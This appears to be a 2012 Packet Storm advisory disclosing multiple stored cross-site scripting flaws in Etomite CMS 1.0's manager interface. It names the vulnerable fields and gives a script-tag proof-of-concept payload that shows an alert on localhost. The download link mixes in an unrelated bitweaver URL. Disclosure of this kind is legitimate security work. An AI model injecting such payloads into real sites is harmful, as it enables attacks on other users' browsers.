Etomite CMS 1.0 Cross Site Scripting

2012-06-22T00:00:00
ID PACKETSTORM:114048
Type packetstorm
Reporter $1l3n7 @$$@$$17
Modified 2012-06-22T00:00:00

Description

                                        
                                            ` ____/\______.__ ________ _________ _____ ____/\__ ____/\__  
_____ ____/\__ ____/\______  
/ / /_/_ | | \_____ \ ___\______ \ / ___ \/ / /_// /  
/_/ / ___ \/ / /_// / /_/_ | ____  
\__/ / \ | | | _(__ < / \ / / / / ._\ \__/ / \ \__/ / \  
/ / ._\ \__/ / \ \__/ / \ | |/ \  
/ / / \| | |__/ \ | \/ / < \_____/ / / \/ / /  
< \_____/ / / \/ / / \| | | \  
/_/ /__ /|___|____/______ /___| /____/ \_____\/_/ /__ /_/ /__  
/\_____\/_/ /__ /_/ /__ /|___|___| /  
\/ \/ \/ \/ \/ \/ \/ \/  
\/ \/ \/ \/ \/  
  
  
------------------------------------------------------------------------------  
  
  
-------------------------------------------------------------------  
  
  
  
TITLE: Etomite CMS Multiple stored XSS  
Vendor: Etomite CMS  
Author: $1l3n7 @$$@$$17  
Email: sil3ntb0t@gmail.com  
Download Link:  
<https://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download>http://www.etomite.com/files/file/323-etomite-11/  
  
Versions: 1.0  
Tested on: Windows7  
  
------------------------------------------------------------------------------  
  
  
------------------------------------------------------------------------------  
  
  
DEMO:  
A)Persistent XSS  
  
http://localhost/etomite/manager/index.php  
  
DEMO:  
http://localhost/etomite/manager/index.php  
  
New Document, New Weblink, Messages(subject and content),  
New keyword(manage resources)  
No of log entries,no of messages and many more fields are  
vulnerable to stored XSS.  
POST DATA= "'-->><script>alert(/xss/)</script>  
Eg:  
  
1: In Manage Resource in keyword tab, 'create new keyword' field  
POST DATA= "'-->><script>alert(0)</script>  
  
2: Similarly 'New Template' field  
http://localhost/etomite/manager/index.php  
  
POST DATA= "'-->><script>alert(/xss/)</script>  
  
  
  
  
----------------------------------------------------------------------------  
  
gr33t1ngs and ShOuTZ to r007k17-w and all my friends..  
`